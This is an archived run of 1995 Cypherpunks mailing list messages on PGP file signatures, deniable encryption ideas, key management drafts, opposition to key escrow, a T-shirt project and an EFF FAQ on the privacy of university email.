PGP files are, of course, compressed to remove redundancy and thus make the method stronger. This, along with the algorithm, produces a "random" bit file. I believe that most files on the Internet are not compressed and thus would show order on statistical sniffing programs. Of the files that are compressed, by PKZIP for example, I believe they would probably have a compression string signature particular to that compression method. Otherwise, compressed files show more randomness. I don't know if compressed programs show an order throughout the file. If they do, then, possibly, PGP could have a function added to it to duplicate this order. This suggests that PGP should also have a function that makes a phoney compression method signature. This would allow PGP'ed files to hide among compressed files on the Net.
-----------

With the removal of the PGP RSA signature and the addition of phony compression signatures, PGP'ed files would travel the Net without drawing attention to themselves. This would greatly facilitate the growth of PGP traffic by organizations.

MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

Oftentimes, Borland C and Assembler can be bought at prices that are a fraction of the price of Microsoft C and Assembler. This suggests that PGP should be programmed with Borland instead of with Microsoft. I think that this would be a step in making PGP a real peoples' encryption method. It is more practical for people to get Borland programming software than Microsoft programming software. This change from Microsoft to Borland might encourage a lot of experimentation and innovation by a lot of individual and small group programmers.

>The person who told me about this also said something about a
>Department of Trade & Industry paper which mentioned that the British
>Government was going to insist on key escrow for encryption. I had
>hoped to get a copy of this, but he can't find it at the moment.
>I'll post the text when I get it if anyone's interested.
>
>Anyone else in the UK heard anything about this?
>
>- --
>B.
THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American without it.

PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCCK! BBBEEEAAATTTT STATE!

From aba at dcs.exeter.ac.uk Tue Sep 12 01:05:41 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Tue, 12 Sep 95 01:05:41 PDT
Subject: anyone got a cpunk URL for the UK munitions T?
Message-ID: <24928.9509120805@exe.dcs.exeter.ac.uk>

On the subject of the UK printing of the munitions T-shirt, I've got a problem, I would like to put a URL for how to obtain the T-shirts, and cypherpunk political material, anti ITAR, clipper etc, but yet I can't very well put my URL:

  http://www.dcs.ex.ac.uk/~aba/rsa/

because that may possibly move within a year, maybe sooner, and T-shirts are so permanent :-(

It seems like too good an opportunity to miss, as some people may get the thing nice publicity, and interest in the cypherpunks take on encryption, so it would be ideal to have an on-line reference on the shirt.

So what I was thinking is it would be nice if someone with a permanent URL, could put a pointer to my URL, that could be updated later, as my URL moves?

A cypherpunks page which has been and will be around for a *long time* with lots of info or pointers to info on ITAR, the evils of key escrow etc would be ideal.

I don't need the WWW space for the actual info as such, just a pointer which can point to where-ever it is my URL moves to, and as most cpunks URLs seem to be in the US, it wouldn't be a v good idea to put my content on a US server anyway (arguably).

Any offers?

Also now I'm here, there were a few people on the list who ordered shirts from me, and the progress has been slow, if you want to see the reasons, and up-to-date state of progress, take a look at:

  http://www.dcs.ex.ac.uk/~aba/uk-shirt.html

I need to decide soon as to what URL to print, I was otherwise thinking of removing the URL, as my sys admin made some strange cryptic comment about me not having my URL after a while anyway (when I finish the course, pointed comment? who knows), and I thought it might not go down too well if I printed my URL on the T-shirt, at least if it's an indirect pointer I have the option to get alternate WWW space.
I have decided to switch printers as the last guy seems to have vanished, no answers to messages on answer phone for > 1 week, and some shirt printers (like the new one I've chosen) offer to do the whole job in a week, and people are getting impatient for their shirts. So I ideally need a commitment of a URL so that I can modify the design & send off to this new printers tonight.

The main criteria, apart from a nice selection of links (I've got ITAR and cpunk links already anyway) is that the URL pointing at my roving URL is going to stay there for a few years, at least.

Adam

From loki at obscura.com Tue Sep 12 01:36:36 1995
From: loki at obscura.com (Lance Cottrell)
Date: Tue, 12 Sep 95 01:36:36 PDT
Subject: anyone got a cpunk URL for the UK munitions T?
Message-ID:

My homepage has not got that many links, but it is fairly well known. I would be happy to set up a WWW page just for you. How about:

  http://obscura.com/~t-shirt/

This will be around for quite a while, since I am getting into the ISP biz, and obscura is my domain.

At 1:05 AM 9/12/95, aba at atlas.ex.ac.uk wrote:
>On the subject of the UK printing of the munitions T-shirt, I've got a
>problem, I would like to put a URL for how to obtain the T-shirts, and
>cypherpunk political material, anti ITAR, clipper etc, but yet I can't
>very well put my URL:
>
> http://www.dcs.ex.ac.uk/~aba/rsa/
>
>because that may possibly move within a year, maybe sooner, and
>T-shirts are so permanent :-(
>
>It seems like too good an opportunity to miss, as some people may get
>the thing nice publicity, and interest in the cypherpunks take on
>encryption, so it would be ideal to have an on-line reference on the
>shirt.
>
>So what I was thinking is it would be nice if someone with a permanent
>URL, could put a pointer to my URL, that could be updated later, as my
>URL moves?
>
>A cypherpunks page which has been and will be around for a *long time*
>with lots of info or pointers to info on ITAR, the evils of key escrow
>etc would be ideal.
>
>I don't need the WWW space for the actual info as such, just a pointer
>which can point to where-ever it is my URL moves to, and as most
>cpunks URLs seem to be in the US, it wouldn't be a v good idea to put
>my content on a US server anyway (arguably).
>
>Any offers?
>
>Also now I'm here, there were a few people on the list who ordered
>shirts from me, and the progress has been slow, if you want to see the
>reasons, and up-to-date state of progress, take a look at:
>
> http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
>
>I need to decide soon as to what URL to print, I was otherwise
>thinking of removing the URL, as my sys admin made some strange
>cryptic comment about me not having my URL after a while anyway (when
>I finish the course, pointed comment? who knows), and I thought it
>might not go down too well if I printed my URL on the T-shirt, at least
>if it's an indirect pointer I have the option to get alternate WWW
>space.
>
>I have decided to switch printers as the last guy seems to have
>vanished, no answers to messages on answer phone for > 1 week, and
>some shirt printers (like the new one I've chosen) offer to do the whole
>job in a week, and people are getting impatient for their shirts. So
>I ideally need a commitment of a URL so that I can modify the design &
>send off to this new printers tonight.
>
>The main criteria, apart from a nice selection of links (I've got ITAR
>and cpunk links already anyway) is that the URL pointing at my roving
>URL is going to stay there for a few years, at least.
>
>Adam

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over,
pinning you underneath. At night the ice weasels come."
--Nietzsche
----------------------------------------------------------

From perry at piermont.com Tue Sep 12 03:25:04 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 12 Sep 95 03:25:04 PDT
Subject: draft key mgmt props
In-Reply-To: <3E79EDD0>
Message-ID: <199509121024.GAA15929@frankenstein.piermont.com>

Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you referring to?

.pm

From perry at piermont.com Tue Sep 12 03:29:50 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 12 Sep 95 03:29:50 PDT
Subject: PGP in UK - snooped as unSTEALTHed?
In-Reply-To: <199509121021.FAA22455@mail.socketis.net>
Message-ID: <199509121029.GAA15937@frankenstein.piermont.com>

Gary Jeffers writes:
> Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> keys to encrypt 3 different files. In all 3 files, the first 3
> characters were the same (an umlauted A, then an i with an up arrow
> over it, and then a heart). This beginning 3 character string is
> apparently the infamous PGP RSA signature. The signature that says
> to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME
> A LOOK!."

As if they couldn't figure it out anyway. It isn't an "RSA signature" by the way. Read format.doc sometime.

> When are the PGP designers and coders going to get serious and
> develop STEALTH PGP inside PGP itself!?

Never, I hope. It would dramatically lower the utility of the system. Can you imagine how disgusting it would be to try decrypting something if you have a dozen keys outstanding? Not to mention how hard it would be to deal with figuring out that you should even try to decrypt things in the first place.
> So what, -that "only a few companies" will be discovered to be using PGP
> through the RSA signature!? Those few companies are the seeds for the
> vast numbers of companies that would follow them in using PGP over the
> Internet. The RSA signature is the flag that allows the spooks to easily
> net the bold first companies. The RSA signature is greatly impeding the
> spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

It isn't an RSA signature. It's a bunch of magic numbers.

Look, get real already. If someone sees a bunch of random numbers in mail sent by me, it's going to be pretty obvious what the hell is inside anyway. I very much see this whole thing as a non-issue.

Perry

From don at cs.byu.edu Tue Sep 12 03:46:13 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Tue, 12 Sep 95 03:46:13 PDT
Subject: Questions on PGP3.0
Message-ID: <199509121046.EAA00209@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Ok, any of you who are involved in PGP 3.0, please fess up. I know that
                                            ^^^^^^^^^^^^^^
it's not even into the RealSoonNow(tm) stages, so I have some questions about features, like are they being addressed/considered/rejected:

1) Extracting & using the IDEA keys
2) Old ID strings retained for signatures, but maybe less obvious
3) Ignoring new ID strings not signed with the key
4) Some kind of This Key will self-destruct in 1 year type of thing so we don't someday have 5 meg keyfiles of revoked keys. Also attempts at dating the signatures on the assumption of honesty
5) Automagically linked keys for secure/nonsecure work
6) Built in rant-detector/filter
7) Add-an-ad, for example "This PGP msg brought to you by Coke!" to help the PGP project gain commercial support.
8) maybe a non-propagation signature, or something to keep joe sixpack from signing a key he just wants to trust (but not declare that trust), because the sig somehow seems to end up on a keyserver.
9) Grab-for-the-throat replacement of some of the add-in tools.
   For example, giving PGP some option so that it comes up with a menu, with one of the options being to invoke the editor that some other program thought it was invoking when it ran PGP.
10) Being able to bypass things like This key not fully certified do you want to certify it yourself (y/N).

Just some thoughts, not a wish list or anything. Umm, well that #6 maybe...

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From postmaster at virgies.com Tue Sep 12 04:20:10 1995
From: postmaster at virgies.com (postmaster at virgies.com)
Date: Tue, 12 Sep 95 04:20:10 PDT
Subject: Scientology tries to break PGP - and
Message-ID:

The following message is being returned to its sender because the addressee does not exist at destination.
<---- Header information -------------------------------------------->
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by altmail.holonet.net with ESMTP id BAA17972; Sat, 9 Sep 1995 01:50:44 -0700
Received: from toad.com by relay3.UU.NET with SMTP id QQzgkp04297; Sat, 9 Sep 1995 04:49:08 -0400
Received: by toad.com id AA21380; Sat, 9 Sep 95 01:46:19 PDT
Received: from blob.best.net by toad.com id AA21371; Sat, 9 Sep 95 01:46:13 PDT
Received: from miron.vip.best.com (daemon at miron.vip.best.com [204.156.129.176]) by blob.best.net (8.6.12/8.6.5) with ESMTP id BAA14766; Sat, 9 Sep 1995 01:46:04 -0700
Received: (from daemon at localhost) by miron.vip.best.com (8.6.12/8.6.12) id BAA01249; Sat, 9 Sep 1995 01:41:32 -0700
Date: Sat, 9 Sep 1995 01:41:32 -0700
Message-Id: <199509090841.BAA01249 at miron.vip.best.com>
To: andrew_loewenstern at il.us.swissbank.com, cypherpunks at toad.com
Remailed-By: remail at extropia.wimsey.com
Comments: This message was anonymously remailed. Do not reply to the address in the from header, unless you wish to report a problem. Thank you.
From: cypherpunks at toad.com
References: <9509081654.AA03407 at ch1d157nwk>
Subject: Re: Scientology tries to break PGP - and fails?
Sender: owner-cypherpunks at toad.com
Precedence: bulk

>
>Tom Rollins writes:
>> If this is the file that the Co$ is trying to crack, then what the
>> is being asked for is a pass phrase that can be handed to the Co$
>> that will pass the PGP valid key check and still not decrypt the
>> data to anything useful.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but
>there is probably a constant after the IV that is prepended to the data. The
>constant is used to determine if the key is correct.
>Since the conventional
>encryption runs in CFB mode and there is a full block of random IV at the
>beginning of the file, it is extremely unlikely that a key could be found
>that would properly decrypt only the first two blocks while leaving the rest
>unreadable...
>
>> If Larry Wollersheim does have the valid key. It would be a simpler
>> process to know what fake key to use and work it backwards through
>> the MD5 to arrive at an ascii string to produce the fake key.
>
>Not really. Even if you could find an IDEA key that would produce the
>desired output it would be hard to find a passphrase that would produce that
>key when hashed. One of the properties of one-way hash functions is that it
>is difficult to find a plaintext that produces a given hash. Hence the term
>'one-way'.... Even if you did find a passphrase (which, if MD5 is strong,
>would require something like 2^64 operations), it would likely be long, have
>8-bit chars, and would be impossible to type in. It would be tough to
>convince anyone that it was the real passphrase.
>
>
>andrew
>

There was a hack to pgp ui published a while back that would allow someone decrypting a RSA encrypted file to print out the idea key. Another feature of the hack allowed someone with the idea key to decrypt an RSA PGP encrypted file ignoring the RSA headers and using the IDEA key directly.

Using this software should allow the receiver of an RSA PGP encrypted file to allow someone else to decrypt it (by giving them the IDEA key) without exposing the secret key. The IV block check will allow them to check that they are using the correct idea key.

From A5113643667 at attpls.net Tue Sep 12 06:06:14 1995
From: A5113643667 at attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 06:06:14 PDT
Subject: No Subject
Message-ID:

Dear Cypherpunks and Tom,

The ones I've heard about are SKIP, Photuris and ISAKMP (sp?).
Peace

---
NOTICE: This message originally included graphics and/or sounds which can only be received by AT&T PersonaLink(sm) subscribers. You received only the text portion(s) of the message. Please contact the sender for information that was deleted. To learn how to send and receive graphics, voice and text messages via AT&T PersonaLink Services, call 1-800-936-LINK.
----------------
Received: by attpls.net with Magicmail;12 Sep 95 10:34:32 UT
Date: 12 Sep 95 13:05:43 UT
Sender: owner-cypherpunks at toad.com (owner-cypherpunks)
From: owner-cypherpunks at toad.com (owner-cypherpunks)
Subject: Re: draft key mgmt props
To: peace at acm.org (Tom Jones)
cc: cypherpunks at toad.com (Cypherpunks)
Message-Id: <199509121024.GAA15929 at frankenstein.piermont.com>
In-Reply-To:
Reply-To: perry at piermont.com (perry)
X-X-AUTHENTICATION-WARNING: frankenstein.piermont.com: Host localhost didn't use HELO protocol
X-X-REPOSTING-POLICY: redistribute only with permission

Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you referring to?

.pm
----------------

From kelso at netcom.com Tue Sep 12 06:48:09 1995
From: kelso at netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 06:48:09 PDT
Subject: VCR+ encode/decode source file error.
Message-ID: <199509121345.GAA21447@netcom3.netcom.com>

Hello,

If anyone is interested, the "vcr+.shar.gz" file from "sable.ox.ac.uk" contains two (2) source files (encode.c and decode.c). These source files both have the same small errors.

Change the source line ...
    int a[12], b[12], out[12] ;
To ...
    int a[18], b[18], out[18] ;

And change the source line ...
    static int start[480], leng[480] ;
To ...
    static int start[512], leng[512] ;

-tom

From johnl at radix.net Tue Sep 12 07:32:41 1995
From: johnl at radix.net (John A. Limpert)
Date: Tue, 12 Sep 95 07:32:41 PDT
Subject: 64 bit crypto
Message-ID: <01BA80F9.97A820A0@dialin18.annex1.radix.net>

>Then the prepare_key routine would take much much longer.
>
>The idea is that a 64 bit crypto routine can be arbitrarily
>secure against brute-forcing, if you are willing to pay a
>runtime penalty every time you use it.

My thought was that there might be shortcuts that the attacker could use to compute the permutation of the state array in less time. I wrote a small test program to look for cycles and weak keys in the 65536 iteration permutation. I assumed a 40 bit key. One weak key was found, 0x0101010101, that produces a 255 iteration cycle. 375 randomly chosen keys were tested and no cycles were found. There ought to be a faster way to compute the permutation with a more analytical approach. My skepticism tells me that nothing is a replacement for more key bits.

In a semi-related question, why don't we see Feistel systems with larger numbers of rounds? Would a modified DES with 256 rounds be any more secure than standard DES?

From frissell at panix.com Tue Sep 12 07:58:25 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 12 Sep 95 07:58:25 PDT
Subject: GAK
Message-ID: <199509121457.KAA28748@panix.com>

At 09:25 PM 9/3/95 -0400, Brian Davis wrote:
>I, of course, know of the "dislike" of GAK here. I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).

Individuals will have their individual objections. My objections are that I don't like governments spending tax money that they don't absolutely have to. Their own survival is *not* a necessity. I think controlling people's speech is a waste of money. Very few Common Law crimes (ie real crimes) are dependent on wiretap evidence for solution.
Only phoney bureaucratic crimes (the retail pharmaceutical trade, insider trading, gambling, conspiring to overthrow the government, etc) need wiretaps.

My second objection is the control of people's speech. If I communicate with someone, I want to communicate with *them*. I don't want to communicate with the Feds. The Supremes have held that the right to speak includes the right not to be forced to speak. By implication, I would argue that I have the right to choose my own channels of communication including my intended audience (and this has been upheld by the Supremes in other contexts). If the Feds want to know what I've written or said (non-publicly) let them subpoena me and I will be happy to tell them to go to hell.

If we can deploy technologies to protect our freedom to communicate the way *we* choose to, then we have the right to do so. Beyond rights, we have the power to do so --- which is worth even more.

>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??

I don't think many of us would feel better if a private party had to approve the invasion of our privacy.

DCF

"You can ignore all of the rest of bullshit. All that you need to know about an enemy is how many guns and men does he have and can they stand fire."

From aleph1 at dfw.net Tue Sep 12 07:58:34 1995
From: aleph1 at dfw.net (Aleph One)
Date: Tue, 12 Sep 95 07:58:34 PDT
Subject: anyone got a cpunk URL for the UK munitions T?
In-Reply-To: <24928.9509120805@exe.dcs.exeter.ac.uk>
Message-ID:

I would be more than happy to set up a page for it or any other cypherpunk material at underground.org. I've been meaning to do some major updates anyway, just been very busy.

Aleph One / aleph1 at dfw.net
http://underground.org/

On Tue, 12 Sep 1995 aba at dcs.exeter.ac.uk wrote:

> So what I was thinking is it would be nice if someone with a permanent
> URL, could put a pointer to my URL, that could be updated later, as my
> URL moves?
>

From jya at pipeline.com Tue Sep 12 08:00:21 1995
From: jya at pipeline.com (John Young)
Date: Tue, 12 Sep 95 08:00:21 PDT
Subject: NRO_puf
Message-ID: <199509121500.LAA08738@pipe2.nyc.pipeline.com>

9-12-95. NYPaper:

"Spy Satellites' Early Role As 'Floodlight' Coming Clear."

Corona. Everything about it was beyond top secret -- its name and history, builders and operators, cameras and orbits, photographs and interpreters and, most important of all, what it snooped on from space. It was officially and assiduously treated for decades as if it did not exist.

The 95 Corona satellites that successfully conducted espionage from 1960 to 1972 turn out to have been remarkably advanced tools whose development, far from the work of an inner circle, drew on the nation's top scientific and industrial talent. More important, the new disclosures show just how greatly the craft revolutionized Washington's ability to understand its cold war friends and enemies.

Sergei Khrushchev, son of the Soviet leader Nikita S. Khrushchev, told the Itek conference that one Corona film pod dropped into a Russian forest, where ax-wielding woodsmen chopped it up. Another spy satellite misdirected its film pod into a field in central Asia, where peasants wrapped the precious Kodak film around poles to provide solitude for a privy.

NRO_puf (16 kb)

From hfarkas at ims.advantis.com Tue Sep 12 08:00:24 1995
From: hfarkas at ims.advantis.com (Henry W. Farkas)
Date: Tue, 12 Sep 95 08:00:24 PDT
Subject: Scientology tries to break PGP - and
Message-ID:

Repost: the following bounced:
-----------------------------------------------------------------------------

On Fri, 8 Sep 1995, Tom Rollins wrote:

> If Larry Wollersheim does have the valid key. It would be a simpler
> process to know what fake key to use and work it backwards through
> the MD5 to arrive at an ascii string to produce the fake key.
>
> Too bad this wouldn't be plausible for the secret ring.
> Perhaps PGP
> needs an option to specify the key in Hex and make the process easy.

Here's another option. I have no idea if it is possible, nor how it would be implemented!

PGP could allow for an alternate secret key and a standard "dummy" document from somewhere in your path. A command line option would encrypt for both keys (as if there were 2 recipients) and append the "dummy" document to the end of the target file when encrypting.

When the safety is finally removed from the gun at your head (sorry for the drama) you hand over your alternate secret key. If decrypted with the "alternate" or "fake" secret key, the encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you use your "primary" or "real key", the extraneous text is simply stripped.

Alternately, the "dummy" file could overwrite the "real" message n times, to keep the decrypted file size more realistic.

If you are forced to turn over keys some day (and I think there is at least a reasonable likelihood of that) then They will have a much harder time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". At that point, with a secure wipe going on while the "decryption" was taking place, you have done the best you could.

I agree- a search warrant gives authorities the right to search your home (or disk)- not a guarantee that they'll find what they're looking for.

===========================================================================
Henry W. Farkas              | Me? Speak for IBM? Fat chance.
hfarkas at ims.advantis.com   |------------------------------------------------
hfarkas at vnet.ibm.com       | http://newstand.ims.advantis.com/henry
henry at nhcc.com             | http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53
Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers.
- --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== From jya at pipeline.com Tue Sep 12 08:05:01 1995 From: jya at pipeline.com (John Young) Date: Tue, 12 Sep 95 08:05:01 PDT Subject: VOO_doo Message-ID: <199509121504.LAA09688@pipe2.nyc.pipeline.com> 9-12-95. NYPaper: "Bulletin Board Is Virtual; Hacker Arrests Are Real." It was a classic sting operation, the kind of undercover gambit that has nabbed bad guys for decades. But the meeting place for this subterfuge was not some grimy storefront. It was a computer bulletin board that the United States Secret Service had rigged together to troll for people who are illegally trafficking in the codes that program cellular phones. " 'Innocent' Files Can Carry a Virus." A new kind of computer virus has descended upon the world. How easy is it to create one? Fifteen minutes after opening a Microsoft Word reference manual, I had cranked out a one-line program that could eliminate crucial system files from a hard drive. By bedtime I had figured out how to get this file to transmogrify Word itself so it would embed my trick program in any document it opened. In an evening, I had created a virus of my very own. This is scary stuff. Scarier still is that if I can do it, millions of others can too. Henceforth virtually every document on the information highway must be considered suspect. 2: VOO_doo From kadie at eff.org Tue Sep 12 08:24:04 1995 From: kadie at eff.org (Carl M. Kadie) Date: Tue, 12 Sep 95 08:24:04 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509082239.PAA20081@ix8.ix.netcom.com.810600068> Message-ID: <4348m6$k72@eff.org> stewarts at ix.netcom.com (Bill Stewart) writes: [...] 
>There may be ECPA issues involved, especially if CalPolySLO is a government-
>run university; the sysadmins certainly need to learn some ethics...
[...]

I think the ECPA should apply to private universities, too. The FERPA also applies to virtually all U.S. private universities.

- Carl

=============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy ===============

q: Can (should) my university monitor my email?

a: Ethically (and perhaps legally) email communications should have the same privacy protection as telephone calls. It would be unwise for any university employee to tap email communications without authorization from the university president, university legal counsel, and the academic freedom committee. According to Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), the U.S.'s Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email. This is also the reported opinion of the U. of Michigan's lawyers. Also, the U.S.'s Family Educational Rights and Privacy Act gives students at all public and most private schools some privacy rights.

A U.S. government task force says that "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA."
In the context of libraries, the American Library Association's Policy on Confidentiality of Library Records suggests this procedure to deal with an official or police request for information about users: 'When drafting local policies, libraries should consult with their legal counsel to insure these policies are based upon and consistent with applicable federal, state, and local law concerning the confidentiality of library records, the disclosure of public records, and the protection of individual privacy. Suggested procedures include the following: 1. The library staff member receiving the request to examine or obtain information relating to circulation or other records identifying the names of library users, will immediately refer the person making the request to the responsible officer of the institution, who shall explain the confidentiality policy. 2. The director, upon receipt of such process, order, or subpoena, shall consult with the appropriate legal officer assigned to the institution to determine if such process, order, or subpoena is in good form and if there is a showing of good cause for its issuance. 3. If the process, order, or subpoena is not in proper form or if good cause has not been shown, insistence shall be made that such defects be cured before any records are released. (The legal process requiring the production of circulation or other library records shall ordinarily be in the form of subpoena "duces tecum" [bring your records] requiring the responsible officer to attend court or the taking of his/her deposition and may require him/her to bring along certain designated circulation or other specified records.) 4. Any threats or unauthorized demands (i.e., those not supported by a process, order, or subpoena) concerning circulation and other records identifying the names of library users shall be reported to the appropriate legal officer of the institution. 5. 
Any problems relating to the privacy of circulation and other records identifying the names of library users which are not provided for above shall be referred to the responsible officer.'

- Carl M. Kadie

ANNOTATED REFERENCES
(All these documents are available on-line. Access information follows.)

================= law/ecpa.1986.godwin =================
* Privacy -- E-mail -- ECPA - University Site
Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), says that the Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email.

================= law/ferpa.text =================
* Privacy -- Students -- FERPA (Buckley Amendment)
The full text of the Family Educational Right to Privacy Act (Buckley Amendment).

================= faq/email.policies =================
* Email -- Policies
q: Do any universities treat email and computer files as private?
a: Yes, many universities treat email and computer files as private. ...

================= library/confidentiality.1.ala =================
* Confidentiality -- 1 (ALA)
The American Library Association's "Policy on Confidentiality of Library Records"
Suggests how to handle police or official requests for information about a user.

================= library/computer.draft.ala =================
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)
A draft interpretation by the American Library Association of the "Library Bill of Rights"
Says in part: "Libraries and librarians exist to facilitate [freedom of speech and freedom to read] by providing access to, identifying, retrieving, organizing, and preserving recorded expression regardless of the formats or technologies in which that expression is recorded."

================= statements/bill-of-rights.aahe =================
* Bill of Rights ... for Electronic ... Learners
This is the "Bill of Rights and Responsibilities for the Electronic Community of Learners".
It could become the first widely endorsed statement directly related to computers and academic freedom. ================= statements/caf-statement ================= * Computer and Academic Freedom Statement -- Draft This is an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. (Critiqued). ================= statements/caf-statement.critique ================= * Computer and Academic Freedom Statement -- Draft -- Critique This is a critique of an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Additional comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. ================= academic/student.freedoms.aaup ================= * Student Freedoms (AAUP) Joint Statement on Rights and Freedoms of Students -- This is the main U.S. statement on student academic freedom. ================= academic/speech-codes.aaup ================= * Speech Codes (AAUP) On Freedom of Expression and Campus Speech Codes Expression - An official statement of the American Association of University Professors (AAUP) It says in part: "On a campus that is free and open, no idea can be banned or forbidden. No viewpoint or message may be deemed so hateful or disturbing that it may not be expressed." ================= law/uwm-post-v-u-of-wisconsin ================= * Expression -- Hate Speech -- UWM Post v. U Of Wisconsin The full text of UWM POST v. U. of Wisconsin. 
This recent district court ruling goes into detail about the difference between protected offensive expression and illegal harassment. It even mentions email. It concludes: "The founding fathers of this nation produced a remarkable document in the Constitution but it was ratified only with the promise of the Bill of Rights. The First Amendment is central to our concept of freedom. The God-given "unalienable rights" that the infant nation rallied to in the Declaration of Independence can be preserved only if their application is rigorously analyzed. The problems of bigotry and discrimination sought to be addressed here are real and truly corrosive of the educational environment. But freedom of speech is almost absolute in our land and the only restriction the fighting words doctrine can abide is that based on the fear of violent reaction. Content-based prohibitions such as that in the UW Rule, however well intended, simply cannot survive the screening which our Constitution demands." ================= law/gillard-v-schmidt ================= * Privacy -- School -- Staff Desk -- Gillard v. Schmidt Description of an appellate court ruling that the school board could not search the desk of a school counselor without a warrant. ================= law/email.gov-employee ================= * Privacy -- E-mail -- Government Employees A U.S. government task force: "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA." Enclosed are guidelines for legitimate monitoring of government employee email. 
================= law/mass-student-searches =================
* Privacy -- Mass Students Searches
An excerpt from The ACLU Handbook: _The Rights of Students_, stating that "there must a reasonable suspicion directed specifically at each student before a school official can search students."

================= law/constraints.constitutional =================
* Constitution -- Public University -- Constraints
Comments from _A Practical Guide to Legal Issues Affecting College Teachers_ by Patricia A. Hollander, D. Parker Young, and Donald D. Gehring. (College Administration Publication, 1985). Discusses the constitutional constraints on public universities including the requirements for freedom of expression, freedom against unreasonable searches and seizures, due process, specific rules.

================= law/ecpa.umich =================
* Privacy -- E-mail -- ECPA - University Site
A summary of a newspaper report that the U. of Michigan's lawyers believe(d) that the institution is barred under the federal Electronic Communications Privacy Act from reading electronic mail.

================= law/privacy.email =================
* Privacy -- E-mail -- Law -- Hernandez
"Computer Electronic Mail and Privacy", an edited version of a law school seminar paper by Ruel T. Hernandez.

================= law/privacy.workplace =================
* Privacy -- Workplace
Comments from and about _The new hazards of the high technology workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email and other electronic monitoring.

================= law/email.bib =================
* Privacy -- E-mail -- Bibliography
I have been having an e-mail conversation with Stacy Veeder for several days on the topic of e-mail privacy. She mailed me this bibliography which she has compiled for two papers which she is currently writing. I post it here with permission. PS - She is interested in talking with anyone who has some views on the topic/information to share. Mark N.
